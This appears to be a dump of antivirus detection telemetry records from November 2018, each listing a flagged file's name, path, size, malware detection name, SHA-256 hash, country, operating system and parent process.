  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:28:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='irfextractor.exe', filepath='C:\\prj\\tools\\IRFExtractor.exe', filesize=640000, name='HEUR/AGEN.1010682.#M1.#R1'), hash='b5c2ef0cbf4c3e853cd7a085b6e257ad5af810f172b9b3f91bf8cbe068db4423', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T14:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:46:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140454-8d2acdcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72da8269\\AVSCAN-20181104-140306-831E4B42\\AVSCAN-20181104-140454-8D2ACDCD', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:04:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:11:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182697.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp105\\A0182697.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:12:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='35a6b74f0914a9ef07b4a56be0fe4631062bdb42', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\35a6b74f0914a9ef07b4a56be0fe4631062bdb42', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='779117bbe246c21ec07017d2d508b1dc45ad036956787ec04e6d1da9a47515ec', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:20:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='174057444.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\174057444.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:41:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182604.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp103\\A0182604.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='421c7f4b9c1e395597280f18b24c2bcbedc132dbdfd989724fed81674d722a0e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:16:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-174315-d3c0d618', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-173734-A423BE75\\AVSCAN-20181102-174315-D3C0D618', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='bc455e162f6a6a84debe52a76d29b133e00027ab75c47efb47c0d460059a261d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:41:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='seal angelicos.exe', filepath='\\\\?\\D:\\game\\SealAngelicos  Online\\SealAngelicos  Online\\Seal Angelicos.EXE', filesize=1664000, name='SPR/RedCap.836e12.#M1.#R1'), hash='836e12c832625d099782f2771993bf9f6c3b64aebcbb97ac65fc6f0107d370d1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9de49d033715d614b112839ff4b9628c8d2ff63c3ba6437d44da61bd5513dd29', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T09:56:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:22:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Sengketa tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='f4ed476dd0bb7b9fc35c8c2334e1404d3b70ce957bdfb9884fd8e4b865e95cef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windowsserver2003-kb942288-v4-x86.exe', filepath='d:\\softwe\\autocad 2014 32bit serial key + patch\\autocad_2014_english_win_32bit_dlm\\3rdparty\\msi\\WindowsServer2003-KB942288-v4-x86.exe', filesize=3072000, name='TR/Patched.Gen.#M300.#R2947'), hash='b82afce9344a2c4241e9c90c0f28aee5a8510d79d1390bf8d3250907c804e047', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:47:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131130-a72e711f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77520266\\AVSCAN-20181102-124826-EB6F45A6\\AVSCAN-20181102-131130-A72E711F', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d0c44d1ffce8faeb560515be65b92aaa63d943f704f7eeff89c61ef63f67e33f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agendador-backup-2017_10_25_20_21_18.exe', filepath='C:\\Users\\X\\Desktop\\NextAgeERP\\Agendador-Backup-2017_10_25_20_21_18.exe', filesize=2240000, name='TR/Dropper.Gen.#M300.#R3643'), hash='fb9d480db0746b75b3c80d0c883c77963cdbce743c523f701a0b004ad7c18cad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T01:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184006-b364f533', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40198741\\AVSCAN-20181102-183844-A86FE0D9\\AVSCAN-20181102-184006-B364F533', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whnvp33.htm', filepath='/Volumes/Sans titre/Save1/Need For Speed Underground 2/Need For Speed Underground 2/Support/EA Help/whgdata/whnvp33.htm', filesize=452000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='b6fc1a15de470768159a917c47ef3aa3ad5aa13a2d093958576a1b55a80a6944', metadata=Row(cmdline=None, country='GA', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013245-bb005c83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013245-BB005C83', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\RuntimeBroker.exe', parentsize=None, timestamp='2018-11-02T23:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114201-dd44d5eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c576493\\AVSCAN-20181102-113606-B0797E42\\AVSCAN-20181102-114201-DD44D5EB', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jkh.open.info.doc.warm.xls', filepath='E:\\FreeFiles\\EIAS\\Отчетность\\2013\\до 30.12.2013\\не раб\\JKH.OPEN.INFO.DOC.WARM.xls', filesize=1856000, name='W97M/Agent.4231.#M1.#R1'), hash='ed86fcaf713e15fd62f2a7c4cc209267064d684ef636cddaeabbbfa009864bde', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api.dll', filepath='\\\\terminal-08\\d\\sp games\\counter-strike source\\bin\\steam_api.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='eed1caac0a746523d36f9fc059b54928a76fda32c7ec79237926658a3d519053', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asante presbytery_lmfdp_handouts.exe', filepath='F:\\ASANTE PRESBYTERY_LMFDP_Handouts\\ASANTE PRESBYTERY_LMFDP_Handouts.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1ge4yuihrya\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\wdnslx3k2ds\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpxgfv0jdb', filepath='/tmp/tmpxgfv0jdb', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T18:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202035-16e5ba6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bc9d898\\AVSCAN-20181102-201923-0F8CCA03\\AVSCAN-20181102-202035-16E5BA6F', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gm5upd.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\gm5upd.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\gm5.exe', parentsize=888832, timestamp='2018-11-02T13:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115653-86258668', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9604648\\AVSCAN-20181102-114426-4B9A9998\\AVSCAN-20181102-115653-86258668', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214456-8bc71474', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0cc6b77\\AVSCAN-20181102-214441-892C71F2\\AVSCAN-20181102-214456-8BC71474', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120249-a21059d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9604648\\AVSCAN-20181102-114426-4B9A9998\\AVSCAN-20181102-120249-A21059D2', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083041-3b529bf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782d9053\\AVSCAN-20181102-083020-BB0E2189\\AVSCAN-20181102-083041-3B529BF9', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0028fe49', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fe49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:23:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sfml_template.exe', filepath='C:\\Users\\X\\Desktop\\SFML\\SFML_TEMPLATE\\x64\\Debug\\SFML_TEMPLATE.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='e733cf022d278b3e4597142d9acba4dade4653d8b5cdd3d6b3e1860f30789812', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\Remote Debugger\\x64\\msvsmon.exe', parentsize=4840568, timestamp='2018-11-04T09:46:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{0EDA61E0-EE0C-4933-A76B-F1788E226A9A} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T20:25:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='allplan_start.exe', filepath='C:\\adobeTemp\\ETRB7B1.tmp\\1\\universal\\Professional\\Support Files\\Plug-ins\\MAXON CINEWARE AE\\(CINEWARE Support)\\lite\\resource\\modules\\objects\\allplan_start.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='fc092f3bf8e7c5efca12ed2c2e2dde567a6cd12ed4d477edbf6f4aa5aad159df', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-04T17:56:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T22:10:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B3BE752D9D1FF652C4B9676BA3A22F004649E5C0855E4801FF3EE5AB0B773063', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nseDCBB.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T14:15:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293670', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293670', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:29:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201538-8848965a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201538-8848965A', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fb0f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fb0f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-033449-ff171e4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eeca9933\\AVSCAN-20181105-033356-D1C09BF3\\AVSCAN-20181105-033449-FF171E4C', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e056c6741ecdb2ecc21a04ab350b0591cd30f50be4a2f6b64c9184a192fa4733', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:26:39Z'), dt=datetime.date(2018, 11, 4)),
